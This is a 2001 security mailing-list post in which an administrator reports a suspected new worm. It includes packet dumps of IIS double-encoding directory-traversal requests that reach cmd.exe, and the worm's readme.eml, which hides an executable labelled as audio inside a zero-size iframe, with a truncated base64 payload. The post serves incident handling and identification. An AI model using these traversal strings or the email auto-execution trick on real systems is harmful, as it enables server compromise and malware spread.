Security Incidents mailing list archives

New worm? 'readme.eml'

From: Pedro Miller Rabinovitch <pedro () cipher com br>
Date: Tue, 18 Sep 2001 12:11:38 -0300

Hi,

is this CodeBlue? Some new worm? Or just one I hadn't heard about?It uses double-encoding exploits, and propagates both by addingjavascript to the main page and by probing other systems...


Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date    Time  D Source IP       Sport Dport   P
01Sep18 11:20 T 200.192.226.40   3933    80   T
01Sep18 11:20 T 200.192.226.40   3767    80   T
01Sep18 11:20 T 200.192.226.40   3572    80   T

 SOURCE: 200.192.226.40

45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xxE...ba@.w..=...(xxxx0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00...P{....~.NP."8.z..47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET/_vti_bin/..%25563 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35c../..%255c../..%25563 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63c../winnt/system32/c6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31md.exe?/c+dir HTTP/12e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e.0..Host: www..Connn

 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....

45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xxE....c@.w..:...(xxxx0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00...P{....O..P."8....47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET/_mem_bin/..%25563 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35c../..%255c../..%25563 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63c../winnt/system32/c6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31md.exe?/c+dir HTTP/12e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e.0..Host: www..Connn

 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....

45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xxE...9e@.w.?....(xxxx0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00.].P{."6.LZ.P."8.6..47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET/msadc/..%255c..2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e/..%255c../..%255c/.2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e.%c1%1c../..%c1%1c..2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79/..%c1%1c../winnt/sy73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69stem32/cmd.exe?/c+di72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 rHTTP/1.0..Host: ww77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73w..Connnection: clos

 65 0d 0a 0d 0a                                              e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), Isaw the normal web page for the institution, plus a pop-up window forhttp://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), asfollows:



MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,

        Pedro.
--
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.

For more information on this free incident handling, managementand tracking system please see: http://aris.securityfocus.com

Current thread:

New worm? 'readme.eml' Pedro Miller Rabinovitch (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)
  - Re: New worm? 'readme.eml' Tony Abedini (Sep 18)
- <Possible follow-ups>
- Re: New worm? 'readme.eml' coop (Sep 18)
- RE: New worm? 'readme.eml' Mark Ng (Sep 18)